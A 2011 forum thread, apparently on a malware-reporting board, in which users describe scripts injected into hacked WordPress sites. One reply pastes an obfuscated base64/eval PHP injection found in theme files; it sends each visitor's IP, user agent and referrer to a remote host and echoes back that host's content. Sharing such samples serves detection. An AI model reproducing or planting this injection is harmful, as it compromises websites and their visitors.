Author Topic:  (Read 6465 times)

0 Members and 1 Guest are viewing this topic.

September 09, 2011, 06:50:40 am
Read 6465 times


  • Jr. Member

  • Offline
  • **

  • 14
On some sites I have seen a new javascript starting with <script id="googleblogcontainer">. You can see the entire script on

The script is encrypted and requests the file That script seems very innocent:
Code: [Select]
function remove(element) {
var parent = element.parentNode;
var my = document.getElementById('googleblogcounter');
my.src = '';
var my = document.getElementById('googleblogcontainer');
my.src = '';

I have not been able to find out what the script tries to do next. is not blacklisted in Google but is on same network as and has also been used in the TimThumb attacks against Wordpress sites.

October 17, 2011, 06:40:09 pm
Reply #1


  • Newbie

  • Offline
  • *

  • 8
The wordpress hacking continue
In all my index files and wordpress theme files i have this  >:(
Code: [Select]
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip $_SERVER['REMOTE_ADDR'];$host $_SERVER['HTTP_HOST'];$uri urlencode($_SERVER['REQUEST_URI']);$ref urlencode($_SERVER['HTTP_REFERER']);$url $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref$tmp file_get_contents($url); echo $tmp?>
Decoded to
Code: [Select]
<?php $url 'hxxp://'?>
Just google 'hxxp://' and see the infected site results  :-[